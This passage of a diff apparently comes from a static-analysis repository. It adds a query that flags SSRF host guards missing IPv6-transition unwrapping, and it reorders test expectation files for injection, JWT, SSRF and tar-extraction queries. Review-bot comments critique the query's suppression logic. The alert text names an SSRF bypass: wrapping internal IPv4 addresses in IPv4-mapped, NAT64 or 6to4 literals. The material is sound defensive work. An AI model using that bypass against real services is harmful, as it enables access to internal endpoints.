+/** Holds if `f` is treated as safe (transition-aware), suppressing the alert. */
+predicate isSafe(File f) { importsSafeClassifier(f) or hasTransitionUnwrap(f) }
+
+from Function guard, File f
+where
+ guard.getFile() = f and
+ isSsrfValidatorFunction(guard) and
+ hasUnsafeGuardSignal(f) and
+ not isSafe(f) and
+ not f.getRelativePath()
+ .regexpMatch("(?i).*/(tests?|specs?|examples?|__tests__|e2e|node_modules)/.*")
+select guard,
+ "This SSRF host guard rejects private IPv4 ranges but never unwraps IPv6-transition forms " +
+ "(IPv4-mapped '::ffff:', NAT64 '64:ff9b::', 6to4 '2002::'); an attacker can wrap an internal " +
+ "IPv4 address in a transition literal to bypass it and reach internal endpoints."
diff --git a/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected b/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected
index c4f42ba87154..0385389e73c1 100644
--- a/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected
+++ b/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected
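Review bot: `isSafe(f)` in SsrfIpv6TransitionIncompleteGuard.ql suppresses the alert on file-wide signals that do not show the flagged `guard` itself handles transition forms, so a bypassable validator can drop out of the results unnoticed. In `hasTransitionUnwrap`, any method call named `range` or `kind` anywhere in the file counts as an unwrap, as does any string literal containing `2001:`, a prefix the query's own description does not list. In `importsSafeClassifier`, merely importing `netmask`, `ip-cidr`, `cidr-matcher` or `blocked-at` counts as safe; `blocked-at` in particular does not look like an address classifier, so each entry should be confirmed to classify IPv4-mapped, NAT64 and 6to4 input before it is allowed to silence the query. I would pass the guard into the suppression predicates and require the evidence inside it, for example `m.getContainer() = guard and m.getMethodName() = "range"`, and drop the `s.getValue().matches("%2001:%")` disjunct. The same file-level scoping makes `hasUnsafeGuardSignal` noisy in the other direction, since the `10\\.` alternative in `hasRfc1918Literal` matches any string containing `10.`, including ordinary version strings.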
@@ -1,8 +1,3 @@ -#select -| test.js:7:16:7:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:7:16:7:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | -| test.js:10:16:10:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:10:16:10:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | -| test.js:18:18:18:24 | payload | test.js:17:21:17:44 | req.que ... rameter | test.js:18:18:18:24 | payload | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | -| test.js:19:18:19:30 | payload + sth | test.js:17:21:17:44 | req.que ... rameter | test.js:19:18:19:30 | payload + sth | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | edges | test.js:5:11:5:17 | payload | test.js:6:30:6:36 | payload | provenance | | | test.js:5:11:5:17 | payload | test.js:9:26:9:32 | payload | provenance | | 
@@ -38,3 +33,8 @@ nodes | test.js:19:18:19:24 | payload | semmle.label | payload | | test.js:19:18:19:30 | payload + sth | semmle.label | payload + sth | subpaths +#select +| test.js:7:16:7:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:7:16:7:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | +| test.js:10:16:10:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:10:16:10:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | +| test.js:18:18:18:24 | payload | test.js:17:21:17:44 | req.que ... rameter | test.js:18:18:18:24 | payload | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | +| test.js:19:18:19:30 | payload + sth | test.js:17:21:17:44 | req.que ... rameter | test.js:19:18:19:30 | payload + sth | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected index bbf737831d6d..d54685c97bef 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected 
@@ -1,6 +1,3 @@ -#select -| test.js:6:15:6:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:6:15:6:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | -| test.js:7:15:7:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:7:15:7:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | edges | test.js:5:9:5:28 | { EnvValue, EnvKey } | test.js:5:11:5:18 | EnvValue | provenance | | | test.js:5:9:5:28 | { EnvValue, EnvKey } | test.js:5:21:5:26 | EnvKey | provenance | | @@ -30,3 +27,6 @@ nodes | test.js:15:15:15:20 | EnvKey | semmle.label | EnvKey | | test.js:16:26:16:33 | EnvValue | semmle.label | EnvValue | subpaths +#select +| test.js:6:15:6:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:6:15:6:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | +| test.js:7:15:7:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:7:15:7:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected index ae8779ded9e7..5ba1884017f6 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected 
@@ -1,7 +1,3 @@ -#select -| test.js:5:35:5:42 | EnvValue | test.js:4:24:4:31 | req.body | test.js:5:35:5:42 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | -| test.js:6:23:6:30 | EnvValue | test.js:4:24:4:31 | req.body | test.js:6:23:6:30 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | -| test.js:7:22:7:29 | EnvValue | test.js:4:24:4:31 | req.body | test.js:7:22:7:29 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | edges | test.js:4:9:4:20 | { EnvValue } | test.js:4:11:4:18 | EnvValue | provenance | | | test.js:4:11:4:18 | EnvValue | test.js:5:35:5:42 | EnvValue | provenance | | @@ -16,3 +12,7 @@ nodes | test.js:6:23:6:30 | EnvValue | semmle.label | EnvValue | | test.js:7:22:7:29 | EnvValue | semmle.label | EnvValue | subpaths +#select +| test.js:5:35:5:42 | EnvValue | test.js:4:24:4:31 | req.body | test.js:5:35:5:42 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | +| test.js:6:23:6:30 | EnvValue | test.js:4:24:4:31 | req.body | test.js:6:23:6:30 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | +| test.js:7:22:7:29 | EnvValue | test.js:4:24:4:31 | req.body | test.js:7:22:7:29 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected b/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected index ba75c463f9be..09db119d0786 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected 
+++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected @@ -1,10 +1,3 @@ -#select -| JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:16:28:16:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:16:28:16:36 | UserToken | without signature verification | -| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:23:28:23:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:23:28:23:36 | UserToken | without signature verification | -| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:24:28:24:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:24:28:24:36 | UserToken | without signature verification | -| jose.js:12:23:12:28 | aJwt() | jose.js:12:23:12:28 | aJwt() | jose.js:15:20:15:28 | UserToken | Decoding JWT $@. | jose.js:15:20:15:28 | UserToken | without signature verification | -| jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:17:16:17:24 | UserToken | Decoding JWT $@. | jwtDecode.js:17:16:17:24 | UserToken | without signature verification | -| jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:16:23:16:31 | UserToken | Decoding JWT $@. | jwtSimple.js:16:23:16:31 | UserToken | without signature verification | edges | JsonWebToken.js:13:11:13:19 | UserToken | JsonWebToken.js:16:28:16:36 | UserToken | provenance | | | JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:13:11:13:19 | UserToken | provenance | | 
@@ -80,3 +73,10 @@ nodes | jwtSimple.js:31:23:31:31 | UserToken | semmle.label | UserToken | | jwtSimple.js:32:23:32:31 | UserToken | semmle.label | UserToken | subpaths +#select +| JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:16:28:16:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:16:28:16:36 | UserToken | without signature verification | +| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:23:28:23:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:23:28:23:36 | UserToken | without signature verification | +| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:24:28:24:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:24:28:24:36 | UserToken | without signature verification | +| jose.js:12:23:12:28 | aJwt() | jose.js:12:23:12:28 | aJwt() | jose.js:15:20:15:28 | UserToken | Decoding JWT $@. | jose.js:15:20:15:28 | UserToken | without signature verification | +| jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:17:16:17:24 | UserToken | Decoding JWT $@. | jwtDecode.js:17:16:17:24 | UserToken | without signature verification | +| jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:16:23:16:31 | UserToken | Decoding JWT $@. | jwtSimple.js:16:23:16:31 | UserToken | without signature verification | diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected b/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected index 54fa92b1b136..364fbd76b002 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected +++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected 
@@ -1,10 +1,3 @@ -#select -| JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:13:28:13:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:13:28:13:36 | UserToken | without signature verification | -| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:20:28:20:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:20:28:20:36 | UserToken | without signature verification | -| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:21:28:21:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:21:28:21:36 | UserToken | without signature verification | -| jose.js:11:23:11:47 | req.hea ... ization | jose.js:11:23:11:47 | req.hea ... ization | jose.js:13:20:13:28 | UserToken | Decoding JWT $@. | jose.js:13:20:13:28 | UserToken | without signature verification | -| jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:15:16:15:24 | UserToken | Decoding JWT $@. | jwtDecode.js:15:16:15:24 | UserToken | without signature verification | -| jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:13:23:13:31 | UserToken | Decoding JWT $@. | jwtSimple.js:13:23:13:31 | UserToken | without signature verification | edges | JsonWebToken.js:10:11:10:19 | UserToken | JsonWebToken.js:13:28:13:36 | UserToken | provenance | | | JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:10:11:10:19 | UserToken | provenance | | 
@@ -55,3 +48,10 @@ nodes | jwtSimple.js:25:23:25:47 | req.hea ... ization | semmle.label | req.hea ... ization | | jwtSimple.js:28:23:28:31 | UserToken | semmle.label | UserToken | subpaths +#select +| JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:13:28:13:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:13:28:13:36 | UserToken | without signature verification | +| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:20:28:20:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:20:28:20:36 | UserToken | without signature verification | +| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:21:28:21:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:21:28:21:36 | UserToken | without signature verification | +| jose.js:11:23:11:47 | req.hea ... ization | jose.js:11:23:11:47 | req.hea ... ization | jose.js:13:20:13:28 | UserToken | Decoding JWT $@. | jose.js:13:20:13:28 | UserToken | without signature verification | +| jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:15:16:15:24 | UserToken | Decoding JWT $@. | jwtDecode.js:15:16:15:24 | UserToken | without signature verification | +| jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:13:23:13:31 | UserToken | Decoding JWT $@. | jwtSimple.js:13:23:13:31 | UserToken | without signature verification | diff --git a/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected b/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected index 0c79678c683f..8a0dabd4c59e 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected +++ b/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected 
@@ -1,24 +1,3 @@ -#select -| check-domain.js:17:13:17:15 | url | check-domain.js:16:15:16:27 | req.query.url | check-domain.js:17:13:17:15 | url | The URL of this request depends on a user-provided value. | -| check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | The URL of this request depends on a user-provided value. | -| check-middleware.js:9:13:9:43 | "test.c ... tainted | check-middleware.js:9:27:9:43 | req.query.tainted | check-middleware.js:9:13:9:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:19:13:19:43 | 'test.c ... tainted | check-path.js:19:27:19:43 | req.query.tainted | check-path.js:19:13:19:43 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:23:13:23:45 | `/addre ... inted}` | check-path.js:23:27:23:43 | req.query.tainted | check-path.js:23:13:23:45 | `/addre ... inted}` | The URL of this request depends on a user-provided value. | -| check-path.js:33:15:33:45 | 'test.c ... tainted | check-path.js:33:29:33:45 | req.query.tainted | check-path.js:33:15:33:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:37:15:37:45 | 'test.c ... tainted | check-path.js:37:29:37:45 | req.query.tainted | check-path.js:37:15:37:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:45:13:45:44 | `${base ... inted}` | check-path.js:45:26:45:42 | req.query.tainted | check-path.js:45:13:45:44 | `${base ... inted}` | The URL of this request depends on a user-provided value. | -| check-regex.js:16:15:16:45 | "test.c ... tainted | check-regex.js:16:29:16:45 | req.query.tainted | check-regex.js:16:15:16:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:24:15:24:42 | baseURL ... 
tainted | check-regex.js:24:25:24:42 | req.params.tainted | check-regex.js:24:15:24:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:31:15:31:45 | "test.c ... tainted | check-regex.js:31:29:31:45 | req.query.tainted | check-regex.js:31:15:31:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:34:15:34:42 | baseURL ... tainted | check-regex.js:34:25:34:42 | req.params.tainted | check-regex.js:34:15:34:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:41:13:41:43 | "test.c ... tainted | check-regex.js:41:27:41:43 | req.query.tainted | check-regex.js:41:13:41:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:61:15:61:42 | baseURL ... tainted | check-regex.js:61:25:61:42 | req.params.tainted | check-regex.js:61:15:61:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:15:15:15:45 | "test.c ... tainted | check-validator.js:15:29:15:45 | req.query.tainted | check-validator.js:15:15:15:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:27:15:27:45 | "test.c ... tainted | check-validator.js:27:29:27:45 | req.query.tainted | check-validator.js:27:15:27:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:50:15:50:45 | "test.c ... tainted | check-validator.js:50:29:50:45 | req.query.tainted | check-validator.js:50:15:50:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:59:15:59:45 | "test.c ... tainted | check-validator.js:59:29:59:45 | req.query.tainted | check-validator.js:59:15:59:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:62:15:62:37 | "test.c ... 
mberURL | check-validator.js:54:21:54:37 | req.query.tainted | check-validator.js:62:15:62:37 | "test.c ... mberURL | The URL of this request depends on a user-provided value. | -| check-validator.js:68:15:68:45 | "test.c ... tainted | check-validator.js:68:29:68:45 | req.query.tainted | check-validator.js:68:15:68:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | edges | check-domain.js:16:9:16:11 | url | check-domain.js:17:13:17:15 | url | provenance | | | check-domain.js:16:15:16:27 | req.query.url | check-domain.js:16:9:16:11 | url | provenance | | 
@@ -86,3 +65,24 @@ nodes | check-validator.js:68:15:68:45 | "test.c ... tainted | semmle.label | "test.c ... tainted | | check-validator.js:68:29:68:45 | req.query.tainted | semmle.label | req.query.tainted | subpaths +#select +| check-domain.js:17:13:17:15 | url | check-domain.js:16:15:16:27 | req.query.url | check-domain.js:17:13:17:15 | url | The URL of this request depends on a user-provided value. | +| check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | The URL of this request depends on a user-provided value. | +| check-middleware.js:9:13:9:43 | "test.c ... tainted | check-middleware.js:9:27:9:43 | req.query.tainted | check-middleware.js:9:13:9:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:19:13:19:43 | 'test.c ... tainted | check-path.js:19:27:19:43 | req.query.tainted | check-path.js:19:13:19:43 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:23:13:23:45 | `/addre ... inted}` | check-path.js:23:27:23:43 | req.query.tainted | check-path.js:23:13:23:45 | `/addre ... inted}` | The URL of this request depends on a user-provided value. | +| check-path.js:33:15:33:45 | 'test.c ... tainted | check-path.js:33:29:33:45 | req.query.tainted | check-path.js:33:15:33:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:37:15:37:45 | 'test.c ... tainted | check-path.js:37:29:37:45 | req.query.tainted | check-path.js:37:15:37:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:45:13:45:44 | `${base ... inted}` | check-path.js:45:26:45:42 | req.query.tainted | check-path.js:45:13:45:44 | `${base ... inted}` | The URL of this request depends on a user-provided value. | +| check-regex.js:16:15:16:45 | "test.c ... 
tainted | check-regex.js:16:29:16:45 | req.query.tainted | check-regex.js:16:15:16:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:24:15:24:42 | baseURL ... tainted | check-regex.js:24:25:24:42 | req.params.tainted | check-regex.js:24:15:24:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:31:15:31:45 | "test.c ... tainted | check-regex.js:31:29:31:45 | req.query.tainted | check-regex.js:31:15:31:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:34:15:34:42 | baseURL ... tainted | check-regex.js:34:25:34:42 | req.params.tainted | check-regex.js:34:15:34:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:41:13:41:43 | "test.c ... tainted | check-regex.js:41:27:41:43 | req.query.tainted | check-regex.js:41:13:41:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:61:15:61:42 | baseURL ... tainted | check-regex.js:61:25:61:42 | req.params.tainted | check-regex.js:61:15:61:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:15:15:15:45 | "test.c ... tainted | check-validator.js:15:29:15:45 | req.query.tainted | check-validator.js:15:15:15:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:27:15:27:45 | "test.c ... tainted | check-validator.js:27:29:27:45 | req.query.tainted | check-validator.js:27:15:27:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:50:15:50:45 | "test.c ... tainted | check-validator.js:50:29:50:45 | req.query.tainted | check-validator.js:50:15:50:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:59:15:59:45 | "test.c ... 
tainted | check-validator.js:59:29:59:45 | req.query.tainted | check-validator.js:59:15:59:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:62:15:62:37 | "test.c ... mberURL | check-validator.js:54:21:54:37 | req.query.tainted | check-validator.js:62:15:62:37 | "test.c ... mberURL | The URL of this request depends on a user-provided value. | +| check-validator.js:68:15:68:45 | "test.c ... tainted | check-validator.js:68:29:68:45 | req.query.tainted | check-validator.js:68:15:68:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | diff --git a/javascript/ql/test/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard/SsrfIpv6TransitionIncompleteGuard.expected b/javascript/ql/test/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard/SsrfIpv6TransitionIncompleteGuard.expected new file mode 100644 index 000000000000..e488048f9afd --- /dev/null +++ b/javascript/ql/test/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard/SsrfIpv6TransitionIncompleteGuard.expected @@ -0,0 +1,2 @@ +| bad-private-ip-pkg.js:6:1:11:1 | async f ... '/');\\n} | This SSRF host guard rejects private IPv4 ranges but never unwraps IPv6-transition forms (IPv4-mapped '::ffff:', NAT64 '64:ff9b::', 6to4 '2002::'); an attacker can wrap an internal IPv4 address in a transition literal to bypass it and reach internal endpoints. | +| bad-rfc1918-regex.js:5:1:16:1 | functio ... '/');\\n} | This SSRF host guard rejects private IPv4 ranges but never unwraps IPv6-transition forms (IPv4-mapped '::ffff:', NAT64 '64:ff9b::', 6to4 '2002::'); an attacker can wrap an internal IPv4 address in a transition literal to bypass it and reach internal endpoints. | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected index 6cceacd031f6..6de2b27bfa76 100644 
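Review bot: Both expected rows in the new `SsrfIpv6TransitionIncompleteGuard.expected` anchor the alert on the whole function (`bad-private-ip-pkg.js:6:1:11:1` and `bad-rfc1918-regex.js:5:1:16:1`) rather than on the guard expression or the outgoing request. A triager therefore gets a multi-line highlight and has to find the incomplete check by hand; selecting the guard condition would make the result easier to act on. The alert text also carries a full explanation; a shorter message such as `This host guard rejects private IPv4 ranges but does not normalise IPv6-transition addresses.`, with the detail moved to the query help, would read better in result lists. Only `bad-*` fixtures appear here, and a fixture whose guard does unwrap these forms would produce no row, so this file cannot show whether a negative case exists. If the test directory lacks one, adding it would pin the false-positive behaviour.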
--- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected 
@@ -1,33 +1,3 @@ -#select -| TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | ControlFlowNode for result | -| TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | ControlFlowNode for members_filter1() | -| TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. 
| TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | 